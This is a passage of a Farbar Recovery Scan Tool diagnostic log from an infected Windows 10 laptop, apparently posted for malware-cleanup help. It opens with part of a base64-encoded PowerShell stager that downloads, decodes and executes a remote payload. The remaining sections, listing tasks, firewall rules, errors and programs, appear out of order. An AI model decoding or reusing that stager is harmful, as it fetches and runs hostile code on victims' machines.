GUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Task: {5F6CAC0E-18E9-44C0-B0A7-6B7B5283B053} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {67A7A9A4-67A3-4723-BE20-8A0DC52591FC} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)
Task: {7837661A-F267-4C88-835D-0FEAB2AFE198} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-01-17] (Microsoft Corporation)
Task: {8163794B-8126-417A-A536-A2D2B46D957A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-01-06] (Hewlett-Packard)
Task: {89EB0970-3EEF-41E1-83D7-B74CA1FC5F84} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-31] (Google Inc.)
Task: {8B8AE3A2-57D8-4878-94C8-91CD171DC1B0} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_20_0_0_286_pepper.exe [2016-02-04] (Adobe Systems Incorporated)
Task: {958BBC7F-8109-4983-8D1C-68C7A044609C} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-02-19] (Microsoft Corporation)
Task: {B736EDDF-5008-4176-B799-5CFAB0C12C94} - System32\Tasks\YCMServiceAgent => C:\Program Files (x86)\CyberLink\YouCam6\YouCamService6.exe [2015-07-01] (CyberLink Corp.)
Task: {BB36727E-D5E4-4914-B0FF-8EF288AD33BD} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {BBBACFB9-610E-4613-BC42-2509005FCC79} - System32\Tasks\HPCeeScheduleForJonathan => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {BCDFCA58-203D-4263-9162-150C79CDFCA3} - System32\Tasks\Avast SecureLine => C:\Program Files\AVAST Software\SecureLine\SecureLine.exe [2016-01-01] (AVAST Software)
Task: {D258A394-8AA0-46DF-9F09-613901AA4AAA} - System32\Tasks\Hewlett-Packard\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [2015-05-21] (Hewlett-Packard Development Company, L.P.)
Task: {E4C69028-920C-463A-8288-F4646F3ACBC8} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2015-06-19] ()
Task: {E73353B5-CA09-4D8A-88FE-1B30EFF5BA32} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2016-01-19] (Microsoft Corporation)
Task: {FF03E025-7817-4F0C-957F-641451E6E937} - System32\Tasks\Hewlett-Packard\HP Support Assistant\First Boot => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF_Utils.exe [2015-09-28] (Hewlett-Packard Company)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_20_0_0_286_pepper.exe
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForJonathan.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.priceline.com/?refid=PLHBC6240OPQ&refclickid=square
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-10-30 02:18 - 2015-10-30 02:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-01-12 22:15 - 2016-01-17 14:46 - 00171712 _____ () C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ApiClient.dll
2016-01-01 14:06 - 2016-01-01 14:06 - 00452456 _____ () C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe
2015-10-13 04:45 - 2015-10-13 04:45 - 00085800 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-10-13 04:45 - 2015-10-13 04:45 - 01328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-09-06 02:20 - 2014-04-14 20:59 - 00389896 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
2015-12-08 10:47 - 2015-11-22 05:47 - 02653816 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-12-08 10:47 - 2015-11-22 05:47 - 02653816 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-01-31 09:22 - 2016-01-17 18:07 - 08913088 _____ () C:\Program Files\Microsoft Office\root\Office16\1033\GrooveIntlResource.dll
2015-12-21 20:52 - 2015-12-06 23:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2015-12-21 20:52 - 2015-12-06 23:00 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-01-12 22:40 - 2016-01-04 20:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-12 22:40 - 2016-01-04 20:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-01-31 09:25 - 2016-01-16 00:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-01-31 09:25 - 2016-01-16 00:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-01-21 18:23 - 2016-01-21 18:23 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-02-23 20:27 - 2016-02-23 20:32 - 01511936 _____ () C:\Users\Jonathan\Downloads\AdwCleaner (1).exe
2016-02-04 10:42 - 2016-02-04 10:42 - 62319736 _____ () C:\Program Files (x86)\Opera\35.0.2066.37\opera.dll
2016-02-04 10:42 - 2016-02-04 10:42 - 02074232 _____ () C:\Program Files (x86)\Opera\35.0.2066.37\libglesv2.dll
2016-02-04 10:42 - 2016-02-04 10:42 - 00081528 _____ () C:\Program Files (x86)\Opera\35.0.2066.37\libegl.dll
2016-01-21 18:23 - 2016-01-21 18:23 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-01-21 18:23 - 2016-01-21 18:23 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-07-10 06:04 - 2015-07-10 06:02 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-2478984944-2039465796-333368353-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Jonathan\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\{0348e5ad-d16b-4e8a-9ec2-517eb7ed8349}.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{35A3A6F1-55C9-4548-B3A7-BF8A56E742AB}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{582A204D-2DFD-486A-8D45-9ED311D4B83E}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{EC64CDB8-1E33-47A8-BA06-62E303E5DE14}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{A6EBF37F-3DC6-4B1C-9739-CF85416F0A78}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{BDC54A86-37B5-414E-8842-85A2F63415A3}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{7CC3ED8B-B61D-4AD2-A903-D45279451D61}] => (Allow) C:\Users\Jonathan\AppData\Local\Temp\nso4EC2.tmp\Installer-10005498.exe
FirewallRules: [{FF0DAC6D-27EC-4654-9CE1-999777489282}] => (Allow) C:\Users\Jonathan\AppData\Local\Temp\nso4EC2.tmp\Installer-10005498.exe
FirewallRules: [{2E505564-064F-4B73-8D04-3F911F8D157B}] => (Allow) c:\Program Files\CyberLink\PowerDirector12\PDR10.EXE
FirewallRules: [{F780D0C8-3EFA-49A7-92E1-E58E9AC0BC98}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVD Cinema\PowerDVDCinema.exe
FirewallRules: [{63606228-7F91-41CC-884B-2A5CC521CBED}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVDMovie.exe
FirewallRules: [{1242B9CA-740F-4A95-B11D-A9A3A84AA081}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe
FirewallRules: [{67BAA940-B885-4DEA-9D53-939946C43A72}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Kernel\DMS\CLMSServerPDVD14.exe
FirewallRules: [{39C06DBF-AADC-4572-989C-5B2080AA1498}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD.exe
FirewallRules: [{894684C0-4F6A-4EEE-A17A-DA8876D701A3}] => (Allow) C:\Program Files (x86)\LucasArts\Star Wars Empire at War\GameData\sweaw.exe
FirewallRules: [{88403454-753A-4B8F-8665-9E059295F793}] => (Allow) C:\Program Files (x86)\LucasArts\Star Wars Empire at War\GameData\sweaw.exe
FirewallRules: [{7D5C406E-D558-4256-B443-4D79C4418A9A}] => (Allow) C:\Program Files (x86)\LucasArts\Star Wars Empire at War Forces of Corruption\swfoc.exe
FirewallRules: [{2C593D07-25E6-463D-9B5D-0277125A40FD}] => (Allow) C:\Program Files (x86)\LucasArts\Star Wars Empire at War Forces of Corruption\swfoc.exe
FirewallRules: [{1343A9D1-9FEC-49E9-856C-350176CB0AD9}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{8DEC24A0-C242-47EF-8C87-77E3CDC9FB34}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{6F4FE454-D50F-4C3A-8A7E-F623137EF2C1}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{80E28F5C-830D-44DD-9D6A-8F05DBFC8A8E}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{7EFBC87D-EC25-4F92-BE76-83F380C8D360}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{5478731B-85FF-4F3C-8903-E17F4C655912}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
11-02-2016 18:06:59 Windows Update
15-02-2016 17:56:09 Windows Update
19-02-2016 07:52:09 Windows Update
19-02-2016 11:24:44 Restore Operation
22-02-2016 15:50:25 Windows Update
23-02-2016 20:27:56 JRT Pre-Junkware Removal
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (02/23/2016 08:28:11 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
 
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
 
System Error:
Access is denied.
.
 
Error: (02/23/2016 08:25:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MsMpEng.exe, version: 4.9.10586.0, time stamp: 0x5632d908
Faulting module name: msvcrt.dll, version: 7.0.10586.0, time stamp: 0x5632d79e
Exception code: 0xc0000005
Fault offset: 0x000000000005d5b8
Faulting process id: 0x884
Faulting application start time: 0xMsMpEng.exe0
Faulting application path: MsMpEng.exe1
Faulting module path: MsMpEng.exe2
Report Id: MsMpEng.exe3
Faulting package full name: MsMpEng.exe4
Faulting package-relative application ID: MsMpEng.exe5
 
Error: (02/23/2016 08:21:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-FDU3B24)
Description: Activation of app Microsoft.Messaging_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (02/23/2016 08:17:15 PM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.1.10600.147) TYPE: ERROR
 
DPTF Build Version:  8.1.10600.147
DPTF Build Date:  May 26 2015 13:35:22
Source File:  ..\..\..\Sources\Manager\EsifApplicationInterface.cpp @ line 737
Executing Function:  DptfEvent
Message:  Received unexpected event
Framework Event:  DptfResume [3]
 
Error: (02/23/2016 06:51:37 PM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.1.10600.147) TYPE: ERROR
 
DPTF Build Version:  8.1.10600.147
DPTF Build Date:  May 26 2015 13:35:22
Source File:  ..\..\..\Sources\Manager\EsifApplicationInterface.cpp @ line 737
Executing Function:  DptfEvent
Message:  Received unexpected event
Framework Event:  DptfResume [3]
 
Error: (02/23/2016 05:39:19 AM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.1.10600.147) TYPE: ERROR
 
DPTF Build Version:  8.1.10600.147
DPTF Build Date:  May 26 2015 13:35:22
Source File:  ..\..\..\Sources\Manager\EsifApplicationInterface.cpp @ line 737
Executing Function:  DptfEvent
Message:  Received unexpected event
Framework Event:  DptfResume [3]
 
Error: (02/22/2016 10:34:08 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 7047
 
Error: (02/22/2016 10:34:08 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 7047
 
Error: (02/22/2016 10:34:08 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
Error: (02/22/2016 10:34:05 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 4875
 
 
System errors:
=============
Error: (02/23/2016 08:26:08 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Defender Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 100 milliseconds: Run the configured recovery program.
 
Error: (02/23/2016 08:21:29 PM) (Source: DCOM) (EventID: 10001) (User: DESKTOP-FDU3B24)
Description: "C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe" -ServerName:SkypeHost.ServerServer15616App.AppXck5aaxyarfx8gxrgfk6pvakmmxeqvepc.mcaUnavailableUnavailable
 
Error: (02/22/2016 10:34:00 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (02/22/2016 08:39:18 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (02/22/2016 08:09:24 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Sync Host_c83bf service to connect.
 
Error: (02/22/2016 08:09:14 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_c83bf service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (02/22/2016 08:09:14 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (02/22/2016 05:49:57 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (02/22/2016 04:51:13 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (02/21/2016 07:50:28 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable
 
 
CodeIntegrity:
===================================
  Date: 2016-02-23 20:41:49.644
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-02-23 20:41:49.604
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-02-23 20:27:09.838
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-02-23 20:27:09.828
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-02-23 20:25:57.869
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-02-22 19:59:56.150
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-02-22 19:59:56.133
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-02-20 18:18:45.722
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-02-19 22:02:08.818
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-02-19 15:33:41.399
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5-5200U CPU @ 2.20GHz
Percentage of memory in use: 41%
Total physical RAM: 6066.26 MB
Available physical RAM: 3575.43 MB
Total Virtual: 7026.26 MB
Available Virtual: 4487.83 MB
 
==================== Drives ================================
 
Drive c: (Windows) (Fixed) (Total:908.33 GB) (Free:827.3 GB) NTFS
Drive d: (RECOVERY) (Fixed) (Total:22 GB) (Free:2.55 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 0E91C364)
 
Partition: GPT.
 
==================== End of Addition.txt ============================Additional scan result of Farbar Recovery Scan Tool (x64) Version:17-02-2016
Ran by Jonathan (2016-02-23 20:44:41)
Running from C:\Users\Jonathan\Downloads
Windows 10 Home (X64) (2015-12-07 00:52:47)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-2478984944-2039465796-333368353-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2478984944-2039465796-333368353-503 - Limited - Disabled)
Guest (S-1-5-21-2478984944-2039465796-333368353-501 - Limited - Disabled)
Jonathan (S-1-5-21-2478984944-2039465796-333368353-1001 - Administrator - Enabled) => C:\Users\Jonathan
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
12 Labours of Hercules III: Girl Power (x32 Version: 3.0.2.118 - WildTangent) Hidden
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.010.20059 - Adobe Systems Incorporated)
Adobe Flash Player 20 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Apple Application Support (32-bit) (HKLM-x32\...\{649A1FD9-5892-46AD-8DF0-C4A43FF61CB7}) (Version: 4.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{0DE0A178-AC7B-4650-806C-CF226DE03766}) (Version: 4.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{3540181E-340A-4E7A-B409-31663472B2F7}) (Version: 9.1.0.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Avast SecureLine (HKLM\...\{2CD3C92F-EDC5-4B02-9B0A-9C1D37C58EF5}_is1) (Version: 1.0.239.2 - AVAST Software)
Azkend 2: The World Beneath (x32 Version: 2.2.0.98 - WildTangent) Hidden
Barn Yarn Collector's Edition (x32 Version: 3.0.2.48 - WildTangent) Hidden
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.)
Coyote The Outlander (x32 Version: 3.0.2.59 - WildTangent) Hidden
CyberLink PhotoDirector (HKLM-x32\...\InstallShield_{5A454EC5-217A-42a5-8CE1-2DDEC4E70E01}) (Version: 5.0.5.6713 - CyberLink Corp.)
CyberLink PhotoDirector (Version: 5.0.5.6713 - CyberLink Corp.) Hidden
CyberLink Power Media Player 14 (HKLM-x32\...\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB}) (Version: 14.0.1.5418 - CyberLink Corp.)
CyberLink PowerDirector 12 (HKLM-x32\...\InstallShield_{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.4.4301 - CyberLink Corp.)
